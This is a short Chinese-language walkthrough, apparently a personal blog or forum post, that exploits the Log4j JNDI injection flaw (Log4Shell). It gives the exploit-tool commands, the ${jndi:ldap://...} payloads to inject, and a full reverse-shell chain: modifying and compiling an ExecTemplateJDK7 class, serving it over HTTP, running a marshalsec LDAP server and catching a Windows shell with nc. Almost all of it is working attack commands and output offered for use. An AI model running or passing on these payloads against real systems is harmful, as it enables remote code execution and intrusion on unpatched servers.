poc来自 https://github.com/tangxiaofeng7/apache-log4j-poc

vps IP 假设为 10.10.10.10 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe" -A 10.10.10.10

[root@VM_0_16_centos ~]# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping xx.24b5010c.dns.1433.eu.org" -A 10.10.10.10
[ADDRESS] >> 10.10.10.10
[COMMAND] >> ping xx.24b5010c.dns.1433.eu.org
----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://10.10.10.10:1099/1ovanh
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://10.10.10.10:1099/kavkt9
ldap://10.10.10.10:1389/kavkt9
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://10.10.10.10:1099/m5m8wo
ldap://10.10.10.10:1389/m5m8wo

然后fuzz ${jndi:ldap://10.10.10.10:1389/kavkt9} 或者 ${jndi:ldap://10.10.10.10:1389/m5m8wo}

试了几个windows的，都是无回显，执行命令磕磕绊绊，最后还是直接反弹了原生shell 我测试了一台windows，使用./src/ExecTemplateJDK7.java 修改里面的host和port为要反弹的地址(如果是linux，使用./src/linux.java就行了,其实就是cmd.exe改成/bin/bash)

然后javac ExecTemplateJDK7.java,生成ExecTemplateJDK7.class

然后在vps上开http服务python3 -m http.server 9092,以及监听端口nc -l 9091

然后同样在vps上 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.10.10.10:9092/#ExecTemplateJDK7 1389

最后fuzz ${jndi:ldap://10.10.10.10:1389}

效果是jdni上收到请求消息 Send LDAP reference result for dd redirecting to http://10.10.10.10:9092/ExecTemplateJDK7.class

httpserver请求 [10/Dec/2021 10:04:39] "GET /ExecTemplateJDK7.class HTTP/1.1" 200

nc收到windows-shell